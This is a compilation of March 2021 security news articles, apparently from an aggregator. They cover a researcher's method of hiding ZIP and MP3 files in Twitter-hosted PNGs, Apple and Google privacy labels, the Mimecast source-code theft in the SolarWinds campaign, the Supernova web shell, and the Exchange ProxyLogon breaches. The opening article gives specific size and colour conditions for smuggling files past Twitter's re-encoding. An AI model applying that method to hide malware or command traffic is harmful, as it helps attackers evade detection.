Researcher David Buchanan heralded his discovery on Twitter earlier this week, accompanied by a photo declaring: “Save this image and change the extension to .zip!”
He made the source code for his method available in a ZIP/PNG file attached to the image as well as on a post on GitHub that explains his methodology.
Specifically, Buchanan demonstrated how he could hide both MP3 audio files and ZIP archives within the PNG images hosted on Twitter. The reason he was successful is because while Twitter strips unnecessary data from PNG uploads, they don’t remove trailing data from the DEFLATE stream inside the IDAT chunk if the overall image file meets the requirements to avoid being re-encoded, he explained.
Buchanan’s finding is important because threat actors have found digital steganography, or the art of hiding information inside media, a useful method especially for obscuring malicious files or other activity, including communication between command and control servers. If his method is successful, it can give attackers another way to hide in hosted images on a widely used social media platform.
The finding also comes on the heels of a discovery by researchers at website security firm Sucuri that Magecart attackers began hiding sensitive data they’ve skimmed from credit cards online inside .JPG files on a website they’ve injected with malicious code.
Certain Conditions
There are some requirements for both the images used to obscure files and the files being hidden inside them for his method to work, Buchanan explained.
“The cover image must compress well, such that the compressed filesize is less than (width * height) – size_of_embedded_file,” he wrote in his post. “If the cover image does not have a palette, then it must have at least 257 unique colors (otherwise Twitter will optimise it to use a palette).”
Resolution on images can be up to 4096 x 4096, although Twitter will serve a downscaled version by default for images greater than 680 x 680 depending on certain factors, Buchanan wrote. The image also should not have any unnecessary “metadata chunks,” he added.
For embedded files, the total output file size must be less than potentially 5MB, but kept under 3MB to be on the safe side, otherwise Twitter will convert the PNG to a JPEG file, Buchanan explained.
Moreover, if the embedded file is a ZIP, then the offsets are automatically adjusted so that the overall file is still a valid ZIP, he said.
“For any other file formats, you’re on your own,” Buchanan added, noting that many will work without special parameters, including PDF and MP3 files.
Proof of Concept
While Threatpost did not download and follow Buchanan’s instructions for demonstrating the files, BleepingComputer did and reported the results.
The original 6KB image Buchanan tweeted with the declaration of his finding–once opened and its file format changed to ZIP–contained an entire ZIP archive with his source code that anyone can use to pack miscellaneous contents into a PNG image, according to the report.
Buchanan also posted another photo to Twitter that he asked people to download, renamed to .mp3 and open in the program VLC “for a surprise,” according to BleepingComputer.
Once opened, the image file, once turned into an MP3 file using Buchanan’s method, would start playing the song “Never Gonna Give You Up” by Rick Astley, according to the report.
Buchanan posted yet another file to prove his point, an image of the Bard, William Shakespeare, which he said is a valid ZIP archive containing a multipart RAR archive with the complete works of Shakespeare embedded within.
The researcher said tried to report the issue to Twitter’s bug bounty program, but was told that it’s not actually a bug. “Fair enough, but that just means we can have some fun with it,” Buchanan tweeted.
Google Reveals What Personal Data Chrome and Its Apps Collect On You
19.3.2021 Hacking Thehackernews
Privacy-focused search engine DuckDuckGo called out rival Google for "spying" on users after the search giant updated its flagship app to spell out the exact kinds of information it collects for personalization and marketing purposes.
"After months of stalling, Google finally revealed how much personal data they collect in Chrome and the Google app. No wonder they wanted to hide it," the company said in a tweet. "Spying on users has nothing to do with building a great web browser or search engine."
The "privacy nutrition labels" are part of a new policy that went into effect on December 8, 2020, mandating app developers to disclose their data collection practices and help users understand how their personal information is put to use.
The insinuation from DuckDuckGo comes as Google has been steadily adding app privacy labels to its iOS apps over the course of the last several weeks in accordance with Apple's App Store rules, but not before a three-month-long delay that caused most of its apps to go without being updated, lending credence to theories that the company had halted iOS app updates as a consequence of Apple's enforcement.
The "privacy label" changes are part of a series of privacy protections that Apple has been incorporating into its products and services in recent years, while simultaneously positioning itself as a more private and secure alternative to other platforms like Facebook and Google.
Starting with iOS 14, first- and third-party apps will not only have to tell users what information they amass but also get their permission to do it. The privacy labels aim to condense an app's data collection practices in an easy-to-understand and user-friendly format without going into great detail about what that data is being used for.
As Vox pointed out last month, the idea is to "strike a balance between giving the general user enough information to understand what an app is doing with their data, but not so much that the labels become as dense and complex as the privacy policies they're supposed to summarize."
But this can also mean that labels alone may not be a sufficient barometer for data collection, as users may have to read an app's privacy policy to really understand what goes on behind the scenes, not to mention completely rely on app developers to be truthful and transparent about what they do with the data.
For its part, Apple updated its privacy website last week with a new "Labels" section that highlights the privacy labels for all of Apple's apps together in one place, making it easier for users to learn about how Apple apps handle their personal data.
App Tracking Transparency Explained
An even bigger deal is an upcoming privacy update to iOS 14.5, which will also require apps to ask for users' consent before tracking them across other apps and websites using the device's advertising identifier (also called IDFA) as part of a new framework dubbed App Tracking Transparency (ATT).
The IDFA (or Identifier for Advertisers) — created by Apple in 2012 — has been traditionally used by companies and marketers to keep tabs on individuals between different apps in order to serve tailored ads and monitor how their ad campaigns performed.
For example, imagine scrolling through your Instagram feed, and you see an ad for a smartphone. You don't tap the ad, but instead, you go on Google, search for the same smartphone you saw on Instagram, and buy them.
Once this purchase is made, the retailer records the IDFA of the user who bought the phone and shared it with Facebook, which can then determine whether the ID corresponds to the user who saw an ad for the smartphone.
An analysis of app data collection practices by cloud storage company pCloud released earlier this month found that 52% of apps share user data with third-parties, with 80% of apps using the collected data to "market their own products in the app" and deliver ads on other platforms.
With the new changes, it's no longer possible for apps and third-party partners to accurately measure the effectiveness of their ads without asking explicit permissions from users to opt-in to being tracked using the identifier as they hop from one app to the other, a move that has riled up Facebook and others that sell mobile ads who heavily rely on this identifier to help target ads to users.
Put differently, while companies can still track users through their own services on a first-party basis, they cannot share that information with third-parties without users' permission.
In what could be a sign of things to come, an analysis by mobile advertising firm AppsFlyer found that after several third-party developers integrated Apple's ATT into their apps, 99% of users chose not to allow tracking.
"Technology does not need vast troves of personal data, stitched together across dozens of websites and apps, in order to succeed. Advertising existed and thrived for decades without it," Apple CEO Tim Cook explained the change in a January 28 speech at the Computers, Privacy and Data Protection (CPDP) conference. "If a business is built on misleading users, on data exploitation, on choices that are no choices at all, then it does not deserve our praise. It deserves reform."
The development comes as tech giants including Apple, Google, Amazon, and Facebook have come under heightened regulatory and privacy scrutiny in the U.S. and Europe for having amassed immense market power and for their collection of personal information, leading to the formation of new data protection laws aimed at safeguarding user privacy.
On Wednesday, France's competition regulator rejected calls from advertising companies and publishers to block ATT on antitrust grounds, stating that the privacy initiative "does not appear to reflect an abuse of a dominant position on the part of Apple," but added it would continue to investigate the changes to ensure that "Apple has not applied less restrictive rules" for its own apps, signaling how measures designed to protect user privacy can be at odds with regulating online competition.
It's worth noting that Google has separately announced plans to stop supporting third-party cookies in its Chrome browser by early 2022 while emphasizing that it would not build alternate identifiers or tools to track users across the web.
Advertisers Test New Tool to Circumvent ATT
But that hasn't stopped advertisers from trying workarounds to sidestep iOS privacy protections, setting them once again on a collision course with Apple.
According to the Financial Times, the Chinese Advertising Association (CAA) has developed an identifier called the China Anonymization ID (or CAID) that's aimed at bypassing the new Apple privacy rules and allow companies to continue tracking users without having to rely on IDFA.
"CAID has the characteristics of anonymity and decentralization, does not collect private data, only transmits the encrypted result, and the encrypted result is irreversible, which can effectively protect the privacy and data security of the end user; the decentralized design allows developers to be more flexible Access to meet business needs," a Guangzhou-based ad-tech firm called TrackingIO explained in a now-removed write-up.
"Because CAID does not depend on Apple IDFA and can generate device identification ID independently of IDFA, it can be used as an alternative to device identification in iOS 14 and a supplementary solution when IDFA is not available," it added.
While CAID is yet to be formally implemented, the tool is said to be presently under testing by some of China's largest technology companies, including ByteDance and Tencent, with "several foreign advertising companies have already applied on behalf of their Chinese divisions," per the report.
It remains to be seen if Apple will green-light this proposal from the CAA, which is said to be "currently actively communicating" with the Cupertino-based company, with the report claiming that "Apple is aware of the tool and seems to have so far turned a blind eye to its use."
"The App Store terms and guidelines apply equally to all developers around the world, including Apple," the iPhone maker told FT. "We believe strongly that users should be asked for their permission before being tracked. Apps that are found to disregard the user's choice will be rejected."
Update
Following reports that companies are readying workarounds to skirt Apple's upcoming limits on ad tracking, the company is said to have sent cease and desist emails to two Chinese app developers who are testing CAID, a new anonymized identifier that's designed to track users even without access to IDFA, according to the Financial Times.
"We found that your app collects user and device information to create a unique identifier for the user's device," the email from Apple read, warning the developer to update the app to comply with App Store rules within 14 days or risk its removal from the App Store.
Besides CAID, other proposed solutions rely on a process called fingerprinting, which leverages device-specific information such as the IMEI number or a combination of the user's IP address and the type of browser and phone to create a unique identifier.
With apps devices numerous ways to slip through Apple's new requirements, it remains to be seen how the tech giant will enforce its anti-tracking policies once it goes into effect later this spring.
Mimecast: SolarWinds Attackers Stole Source Code
18.3.2021 Hacking Threatpost
A new Mimecast update reveals the SolarWinds hackers accessed several “limited” source code repositories.
Hackers who compromised Mimecast networks as part of the SolarWinds espionage campaign have swiped some of the security firm’s source code repositories, according to an update by the company.
The email security firm initially reported that a certificate compromise in January was part of the sprawling SolarWinds supply-chain attack that also hit Microsoft, FireEye and several U.S. government agencies.
Attackers were found initially to have stolen a subset of Mimecast customers’ email addresses and other contact information, as well as certain hashed and salted credentials. However, in the most recent part of its investigation into the SolarWinds hack, Mimecast said it has found evidence that a “limited” number of source code repositories were also accessed.
However, the security vendor sought to downplay the impact of this access: “We believe that the source code downloaded by the threat actor was incomplete and would be insufficient to build and run any aspect of the Mimecast service,” it said in a Tuesday update. “We found no evidence that the threat actor made any modifications to our source code nor do we believe that there was any impact on our products.”
Update to Mimecast Investigation
In January, Microsoft discovered that attackers had compromised a Mimecast-owned certificate, used to authenticate Mimecast Sync and Recover (which provides backups for various mail content), Continuity Monitor (which monitors for email traffic disruptions), and Internal Email Protect (IEP) products to Microsoft 365 Exchange Web Services.
The threat actor used this certificate to connect to a “low single-digit number” of customers’ Microsoft 365 tenants from non-Mimecast IP address ranges. The attackers then leveraged Mimecast’s Windows environment to potentially extract customers’ encrypted service account credentials, hosted in the United States and the United Kingdom.
“These credentials establish connections from Mimecast tenants to on-premise and cloud services, which include LDAP, Azure Active Directory, Exchange Web Services, POP3 journaling, and SMTP-authenticated delivery routes,” said Mimecast.
Initially, Mimecast had said there is no evidence that the threat actor accessed customers’ email or archive content – in its Tuesday update, the security firm reiterated this claim. However, the attackers’ access to source code could give them an inside look at various product components and other sensitive information. Further information about the type of source code accessed is not available other than Mimecast saying that the source code accessed by attackers was “incomplete;” Mimecast did not provide further information on the accessed source code when reached by Threatpost.
The company said it will continue to analyze and monitor its source code (by implementing additional security analysis measures across the source code tree) to protect against potential misuse. Since the start of the attack, Mimecast has issued a new certificate connection and advised affected customers to switch to that connection; as well as removed and blocked the threat actor’s means of access to the company’s affected segment (its production grid environment).
SolarWinds Hack: Consequences Continue to Play Out
SolarWinds attackers also nabbed source code repositories from Microsoft. The Microsoft repositories contained code for: A small subset of Azure components including those related to service, security and identity; a small subset of Intune components; and a small subset of Exchange components.
Mimecast’s update is only the latest in the widescale SolarWinds hack. Texas-based SolarWinds was the primary victim of the now-infamous cyberattack believed to be the work of Russian state-sponsored actors. During the attack, adversaries leveraged SolarWinds’ Orion network management platform to infect users with a backdoor called “Sunburst,” which paved the way for lateral movement to other parts of networks.
This backdoor was initially pushed out via trojanized product updates to almost 18,000 organizations around the globe—including high-profile victims such as the U.S. Department of Homeland Security (DHS) and the Treasury and Commerce departments—starting last spring. Other cybersecurity vendors – like CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys – have also been targeted as part of the attack.
Once embedded, the attackers were able to pick and choose which organizations to further penetrate.
Since then, several strains of malware have also been discovered, which were associated with the attackers behind the SolarWinds hack. The malware families include: A backdoor that’s called GoldMax; a dual-purpose malware called Sibot and a malware called GoldFinder. In addition to Sunburst, which is the malware used as the tip of the spear in the campaign, researchers in January unmasked additional pieces of malware,
SolarWinds hackers stole some of Mimecast source code
18.3.2021 Hacking Securityaffairs
Cybersecurity firm Mimecast confirmed that SolarWinds hackers who breached its network stole some of its source code.
Back in December, the SolarWinds supply chain attack made the headlines when a Russian cyber espionage group tampered with updates for SolarWinds’ Orion Network Management products that the IT company provides to government agencies, military, and intelligence offices.
Mimecast was one of SolarWinds customers that were impacted by the attack, its systems were infected with the Sunburst backdoor distributed through tainted Orion software updates.
Now the company admitted that hackers stole part of its source code from its repositories, but did not modified it.
Mimecast also added that the source code accessed by the hackers was incomplete and would be used to build and run any component of the Mimecast service.
“Using this entry point, the threat actor accessed certain Mimecast-issued certificates and related customer server connection information. The threat actor also accessed a subset of email addresses and other contact information, as well as encrypted and/or hashed and salted credentials. In addition, the threat actor accessed and downloaded a limited number of our source code repositories, but we found no evidence of any modifications to our source code nor do we believe there was any impact on our products.” reads the incident report published by mimecast. “We have no evidence that the threat actor accessed email or archive content held by us on behalf of our customers.”
Mimecast states that only a few customers who used the stolen certificate were targeted by the threat actor, it already notified them. The company urged customers hosted in the United States and United Kingdom to reset any server connection credentials in use on the Mimecast platform as a precautionary measure.
The company added that it is resetting the affected hashed and salted credentials as a precautionary step.
Below the list of additional remediation measures implemented by the company in response to the security incident:
Rotated all impacted certificates and encryption keys.
Upgraded encryption algorithm strength for all stored credentials.
Implemented enhanced monitoring of all stored certificates and encryption keys.
Deployed additional host security monitoring functionality across all of our infrastructure.
Decommissioned SolarWinds Orion and replaced it with an alternative NetFlow monitoring system.
Rotated all Mimecast employee, system, and administrative credentials, and expanded hardware-based two-factor authentication for employee access to production systems.
Completely replaced all compromised servers.
Inspected and verified our build and automation systems to confirm that Mimecast-distributed executables were not tampered with.
Implemented additional static and security analysis across the source code tree.
You can find more details about the SolarWinds attack here.
Mimecast Says SolarWinds Hackers Stole Source Code
18.3.2021 Hacking Securityweek
Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack, and revealed that the threat actor managed to steal some source code.
Mimecast was one of the several cybersecurity companies to confirm being targeted by the hackers who breached the systems of IT management solutions provider SolarWinds.
After compromising SolarWinds systems, the attackers, which have been linked to Russia, used their access to deliver malicious updates for SolarWinds’ Orion monitoring product to roughly 18,000 customers. A few hundred of these customers, including government and private organizations, were further targeted.
One of these targets was Mimecast, which learned about the intrusion from Microsoft. The tech giant had noticed that a certificate used by Mimecast customers to authenticate certain products with Microsoft 365 services had been compromised.
The investigation, conducted with the aid of FireEye’s Mandiant incident response unit, revealed that the hackers gained access to part of Mimecast’s production environment using the SUNBURST malware delivered via malicious Orion product updates.
The threat actor then managed to move laterally within the compromised environment, gaining access to various types of systems and information.
The compromised certificate discovered by Microsoft was used by the attackers to connect to the Microsoft 365 tenants of a “low single-digit number” of customers.
In addition, the hackers obtained encrypted service account credentials created by customers in the US and UK. These credentials, which are used for connections between Mimecast tenants and on-premises and cloud services, do not appear to have been decrypted or misused.
“We have no evidence that the threat actor accessed email or archive content held by us on behalf of our customers,” Mimecast said in an incident report published on Tuesday.
However, the attackers did manage to gain access to a “subset” of email addresses and other contact information, as well as hashed and salted credentials. Impacted customers have been notified.
The investigation also showed that the attackers — similar to what they did in the case of other victims, including Microsoft — also accessed and downloaded “a limited number” of source code repositories.
“We believe that the source code downloaded by the threat actor was incomplete and would be insufficient to build and run any aspect of the Mimecast service. We found no evidence that the threat actor made any modifications to our source code nor do we believe that there was any impact on our products,” Mimecast said.
In response to the incident, the cybersecurity firm rotated all impacted encryption keys and certificates, stopped using the Orion product, changed all employee and system credentials, enhanced authentication security, completely replaced all hacked servers, and rolled out additional security monitoring systems.
Mimecast Finds SolarWinds Hackers Stole Some of Its Source Code
18.3.2021 Hacking Thehackernews
Email security firm Mimecast on Tuesday revealed that the state-sponsored SolarWinds hackers who broke into its internal network also downloaded source code out of a limited number of repositories.
"The threat actor did access a subset of email addresses and other contact information and hashed and salted credentials," the company said in a write-up detailing its investigation, adding the adversary "accessed and downloaded a limited number of our source code repositories, as the threat actor is reported to have done with other victims of the SolarWinds Orion supply chain attack."
But Mimecast said the source code downloaded by the attackers was incomplete and would be insufficient to build and run any aspect of the Mimecast service and that it did not find signs of any tampering made by the threat actor to the build process associated with the executables that are distributed to its customers.
On January 12, Mimecast disclosed that that "a sophisticated threat actor" had compromised a digital certificate it provided to certain customers to securely connect its products to Microsoft 365 (M365) Exchange.
Weeks later, the company tied the incident to the SolarWinds mass exploitation campaign, noting that the threat actor accessed and possibly exfiltrated certain encrypted service account credentials created by customers hosted in the U.S. and the U.K.
Noting that the intrusion stemmed as a result of Sunburst backdoor that was deployed via trojanized SolarWinds Orion software updates, the company said it observed lateral movement from the initial access point to its production grid environment containing a small number of Windows servers in a manner that was consistent with the attack pattern attributed to the threat actor.
Although the exact number of customers who used the stolen certificate remains unknown, the company said in January that "a low single digit number of our customers' M365 tenants were targeted."
Alleged to be of Russian origin, the threat actor behind the SolarWinds supply-chain attacks is being tracked under multiple names, including UNC2452 (FireEye), Dark Halo (Volexity), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Nobelium (Microsoft).
Mimecast, which had roped Mandiant to lead its incident response efforts, said it concluded the probe earlier this month.
As part of a slew of countermeasures, the company also noted that it fully replaced the compromised Windows servers, upgraded the encryption algorithm strength for all stored credentials, implemented enhanced monitoring of all stored certificates and encryption keys and that it had decommissioned SolarWinds Orion in favor of a NetFlow monitoring system.
SolarWinds Hack — New Evidence Suggests Potential Links to Chinese Hackers
10.3.2021 Hacking Thehackernews
A malicious web shell deployed on Windows systems by leveraging a previously undisclosed zero-day in SolarWinds' Orion network monitoring software may have been the work of a possible Chinese threat group.
In a report published by Secureworks on Monday, the cybersecurity firm attributed the intrusions to a threat actor it calls Spiral.
Back on December 22, 2020, Microsoft disclosed that a second espionage group may have been abusing the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on target systems.
The findings were also corroborated by cybersecurity firms Palo Alto Networks' Unit 42 threat intelligence team and GuidePoint Security, both of whom described Supernova as a .NET web shell implemented by modifying an "app_web_logoimagehandler.ashx.b6031896.dll" module of the SolarWinds Orion application.
The alterations were made possible not by breaching the SolarWinds app update infrastructure but instead by leveraging an authentication bypass vulnerability in the Orion API tracked as CVE-2020-10148, in turn allowing a remote attacker to execute unauthenticated API commands.
"Unlike Solorigate [aka Sunburst], this malicious DLL does not have a digital signature, which suggests that this may be unrelated to the supply chain compromise," Microsoft had noted.
While the Sunburst campaign has since been formally linked to Russia, the origins of Supernova remained a mystery until now.
According to Secureworks Counter Threat Unit (CTU) researchers — who discovered the malware in November 2020 while responding to a hack in one of its customers' networks — "the immediate and targeted nature of the lateral movement suggests that Spiral had prior knowledge of the network."
During the course of further investigation, the firm said it found similarities between the incident and that of a prior intrusion activity on the same network uncovered in August 2020, which had been accomplished by exploiting a vulnerability in a product known as ManageEngine ServiceDesk as early as 2018.
"CTU researchers were initially unable to attribute the August activity to any known threat groups," the researchers said. "However, the following similarities to the Spiral intrusion in late 2020 suggest that the Spiral threat group was responsible for both intrusions."
The connection to China stems from the fact that attacks targeting ManageEngine servers have long been associated with threat groups located in the country, not to mention the modus operandi of exploiting long-term persistence to collect credentials, exfiltrate sensitive data, and plunder intellectual property.
But more solid evidence arrived in the form of an IP address that geolocated to China, which the researchers said came from a host that was used by the attackers to run Secureworks's endpoint detection and response (EDR) software for reasons best known to the threat actor, suggesting the software may have been stolen from the compromised customer.
"The threat group likely downloaded the endpoint agent installer from the network and executed it on the attacker-managed infrastructure," the researchers detailed. "The exposure of the IP address was likely unintentional, so its geolocation supports the hypothesis that the Spiral threat group operates out of China."
It's worth pointing out that SolarWinds addressed Supernova in an update to Orion Platform released on December 23, 2020.
Microsoft Exchange Hackers Also Breached European Banking Authority
10.3.2021 Hacking Thehackernews
The European Banking Authority (EBA) on Sunday said it had been a victim of a cyberattack targeting its Microsoft Exchange Servers, forcing it to temporarily take its email systems offline as a precautionary measure.
"As the vulnerability is related to the EBA's email servers, access to personal data through emails held on that servers may have been obtained by the attacker," the Paris-based regulatory agency said.
EBA said it's launched a full investigation into the incident in partnership with its information and communication technology (ICT) provider, a team of forensic experts, and other relevant entities.
In a second update issued on Monday, the agency said it had secured its email infrastructure and that it found no evidence of data extraction, adding it has "no indication to think that the breach has gone beyond our email servers."
Besides deploying extra security measures, EBA also noted it's closely monitoring the situation after restoring the full functionality of the email servers.
The development is a consequence of an ongoing widespread exploitation campaign by multiple threat actors targeting vulnerable Microsoft Exchange email servers a week after Microsoft rolled out emergency patches to address four security flaws that could be chained to bypass authentication and remotely execute malicious programs.
Microsoft is said to have learned of these vulnerabilities as early as January 5, 2021, indicating that the company had almost two months before it eventually pushed out a fix that shipped on March 2.
The Exchange Server mass hack has so far claimed at least 60,000 known victims globally, including a significant number of small businesses and local governments, with the attackers casting a wide net before filtering high-profile targets for further post-exploitation activity.
The rapidly accelerating intrusions, which also come three months after the SolarWinds hacking campaign, has been primarily attributed to a group called Hafnium, which Microsoft says is a state-sponsored group operating out of China.
Since then, intelligence gathered from multiple sources points to an increase in anomalous web shell activity targeting Exchange servers by at least five different threat clusters toward the end of February, a fact that may have played an important role in Microsoft releasing the fixes a week ahead of the Patch Tuesday schedule.
Indeed, according to the vulnerability disclosure timeline shared by Taiwanese cybersecurity firm Devcore, Microsoft's Security Response Center (MSRC) is said to have originally planned the patch for March 9, which coincides with the Patch Tuesday for this month.
If the commoditization of the ProxyLogon vulnerabilities doesn't come as a surprise, the swift and indiscriminate exploitation by a multitude of cybercrime gangs and nation-state hackers alike is sure is, implying that the flaws were relatively easier to spot and exploit.
Stating that the Chinese Exchange server hacks are a major norms violation, Dmitri Alperovitch, chairman of the Silverado Policy Accelerator and co-founder of CrowdStrike, said "while it started out as targeted espionage campaign, they engaged in reckless and dangerous behavior by scanning/compromising Exchange servers across the entire IPv4 address space with web shells that can now be used by other actors, including ransomware crews."
Hackers compromised Microsoft Exchange servers at the EU Banking Regulator EBA
9.3.2021 Hacking Securityaffairs
The European Banking Authority (EBA) disclosed a cyberattack that resulted in the hack of its Microsoft Exchange email system.
The European Banking Authority announced that it was the victim of a cyber attack against its email system that exploited recently disclosed zero-day vulnerabilities in Microsoft Exchange.
On March 2nd, Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.
The IT giant reported that at least one China-linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments. According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued the Emergency Directive 21-02 in response to the disclosure of zero-day vulnerabilities in Microsoft Exchange. The US CISA ordered federal agencies to urgently update or disconnect MS Exchange on-premises installs.
On Sunday, the EU financial regulator disclosed the attack and took offline its email systems in response to the attack as a precautionary measure.
“The European Banking Authority (EBA) has been the subject of a cyber-attack against its Microsoft Exchange Servers, which is affecting many organisations worldwide.” reads a statement published by the EBA. “As the vulnerability is related to the EBA’s email servers, access to personal data through emails held on that servers may have been obtained by the attacker.”
The financial agency has launched an investigation into the incident and notified the relevant authorities, EBA is currently working with a team of forensic experts.
According to the EBA, personal data through emails that were maintained on that compromised the email systems may have been obtained by the attacker.
Microsoft updated MSERT to detect web shells used in attacks against Microsoft Exchange installs
9.3.2021 Hacking Securityaffairs
Microsoft updated its Microsoft Safety Scanner (MSERT) tool to detect web shells employed in the recent Exchange Server attacks.
Early this month, Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported Microsoft Exchange versions that are actively exploited in the wild.
The IT giant reported that at least one China linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments.
“Microsoft has detected multiple 0-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” reads the advisory published by Microsoft. “Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.”
The attack chain starts with an untrusted connection to Exchange server port 443.
The first zero-day, tracked as CVE-2021-26855, is a server-side request forgery (SSRF) vulnerability in Exchange that could be exploited by an attacker to authenticate as the Exchange server by sending arbitrary HTTP requests.
The second flaw, tracked as CVE-2021-26857, is an insecure deserialization vulnerability that resides in the Unified Messaging service. The flaw could be exploited by an attacker with administrative permission to run code as SYSTEM on the Exchange server.
The third vulnerability, tracked as CVE-2021-26858, is a post-authentication arbitrary file write vulnerability in Exchange.
The last flaw, tracked as CVE-2021-27065, is a post-authentication arbitrary file write vulnerability in Exchange.
According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations. The group historically launched cyber espionage campaigns aimed at US-based organizations in multiple industries, including law firms and infectious disease researchers.
Microsoft immediately updated signatures for Microsoft Defender to detect web shells that were deployed by the attackers exploiting the above zero-day flaws.
Microsoft also updated the Microsoft Support Emergency Response Tool (MSERT) to detect the web shells employed in the attacks against the Exchange servers and remove them.
The MSERT tool is a self-contained executable file that scans a computer for malware and reports its findings, it is also able to remove detected malware.
For customers that are not able to quickly apply security updates released by Microsoft to fix the zero-day vulnerabilities, the IT giant provided alternative mitigation techniques.
“Interim mitigations if unable to patch Exchange Server 2013, 2016, and 2019: Implement an IIS Re-Write Rule and disable Unified Messaging (UM), Exchange Control Panel (ECP) VDir, and Offline Address Book (OAB) VDir Services.” reads the post published by Microsoft.
Administrators could use MSERT to make a full scan of the install or they can perform a ‘Customized scan’ of the following paths where malicious files from the threat actor have been observed:
%IIS installation path%\aspnet_client\*
%IIS installation path%\aspnet_client\system_web\*
%Exchange Server installation path%\FrontEnd\HttpProxy\owa\auth\*
Configured temporary ASP.NET files path
%Exchange Server Installation%\FrontEnd\HttpProxy\ecp\auth\*
“These remediation steps are effective against known attack patterns but are not guaranteed as complete mitigation for all possible exploitation of these vulnerabilities. Microsoft Defender will continue to monitor and provide the latest security updates.” concludes Microsoft.
As reported by Bleeping Computer, administrators that would like to scan for web shells associated with these attacks without removing them can use a new PowerShell script released by CERT Latvia.
More information on how to use this script can be found in the CERT-LV project’s GitHub repository.
Microsoft also released a PowerShell script called Test-ProxyLogon.ps1 that can be used to search for indicators of compromise (IOC) related to these attacks in Exchange and OWA log files.
Microsoft Server Hack Has Victims Hustling to Stop Intruders
9.3.2021 Hacking Securityweek
Victims of a massive global hack of Microsoft email server software — estimated in the tens of thousands by cybersecurity responders — hustled Monday to shore up infected systems and try to diminish chances that intruders might steal data or hobble their networks.
The White House has called the hack an “active threat” and said senior national security officials were addressing it.
The breach was discovered in early January and attributed to Chinese cyber spies targeting U.S. policy think tanks. Then in late February, five days before Microsoft issued a patch on March 2, there was an explosion of infiltrations by other intruders, piggybacking on the initial breach. Victims run the spectrum of organizations that run email servers, from mom-and-pop retailers to law firms, municipal governments, healthcare providers and manufacturers.
While the hack doesn’t pose the kind of national security threat as the more sophisticated SolarWinds campaign, which the Biden administration blames on Russian intelligence officers, it can be an existential threat for victims who didn’t install the patch in time and now have hackers lingering in their systems. The hack poses a new challenge for the White House, which even as it prepares to respond to the SolarWinds breach, must now grapple with a formidable and very different threat from China.
“I would say it’s a serious economic security threat because so many small companies out there can literally have their business destroyed through a targeted ransomware attack,” said Dmitri Alperovitch, former chief technical officer of the cybersecurity firm CrowdStrike.
He blames China for the global wave of infections that began Feb. 26, though other researchers say it’s too early to confidently attribute them. It’s a mystery how those hackers got wind of the initial breach because no one knew about this except a few researchers, Alperovitch said.
After the patch was released, a third wave of infections began, a piling on that typically occurs in such cases because Microsoft dominates the software market and offers a single point of attack.
Cybersecurity analysts trying to pull together a complete picture of the hack said their analyses concur with the figure of 30,000 U.S. victims published Friday by cybersecurity blogger Brian Krebs. Alperovitch said about 250,000 global victims has been estimated.
Microsoft has declined to say how many customers it believes are infected.
David Kennedy, CEO of cybersecurity firm TrustedSec, said hundreds of thousands of organizations could have been vulnerable to the hack.
“Anybody that had Exchange installed was potentially vulnerable,” he said. “It’s not every single one but it’s a large percentage of them.”
Katie Nickels, director of intelligence at the cybersecurity firm Red Canary, warned that installing patches won’t be enough to protect those already infected. “If you patch today that is going to protect you going forward but if the adversaries are already in your system then you need to take care of that,” she said.
A smaller number of organizations were targeted in the initial intrusion by hackers who grabbed data, stole credentials or explored inside networks and left backdoors at universities, defense contractors, law firms and infectious-disease research centers, researchers said. Among those Kennedy has been working with are manufacturers worried about intellectual property theft, hospitals, financial institutions and managed service providers who host multiple company networks.
“On the scale of one to 10, this is a 20,” Kennedy said. “It was essentially a skeleton key to open up any company that had this Microsoft product installed.”
Asked for comment, the Chinese embassy in Washington pointed to remarks last week from Foreign Ministry spokesperson Wang Wenbin saying that China “firmly opposes and combats cyber attacks and cyber theft in all forms” and cautioning that attribution of cyberattacks should be based on evidence and not “groundless accusations.”
The hack did not affect the cloud-based Microsoft 365 email and collaboration systems favored by Fortune 500 companies and other organizations that can afford quality security. That highlights what some in the industry lament as two computing classes — the security “haves” and “have-nots.”
Ben Read, director of analysis at Mandiant, said the cybersecurity firm has not seen anyone leverage the hack for financial gain, “but for folks out there who are affected time is of the essence in terms of of patching this issue.”
That is easier said than done for many victims. Many have skeleton IT staff and can’t afford an emergency cybersecurity response — not to mention the complications of the pandemic.
Fixing the problem isn’t as simple as clicking an update button on a computer screen. It requires upgrading an organization’s entire so-called “Active Directory,” which catalogues email users and their respective privileges.
“Taking down your e-mail server is not something you do lightly,” said Alperovitch, who chairs the nonprofit Silverado Policy Accelerator think tank.
Tony Cole of Attivo Networks said the huge number of potential victims creates a perfect “smokescreen” for nation-state hackers to hide a much smaller list of intended targets by tying up already overstretched cybersecurity officials. “There’s not enough incident response teams to handle all of this.”
Many experts were surprised and perplexed at how groups rushed to infect server installations just ahead of Microsoft’s patch release. Kennedy, of TrustedSec, said it took Microsoft too long to get a patch out, though he does not think it should have notified people about it before the patch was ready.
Steven Adair of the cybersecurity firm Volexity, which alerted Microsoft to the initial intrusion, described a “mass, indiscriminate exploitation” that began the weekend before the patch was released and included groups from “many different countries, (including) criminal actors.”
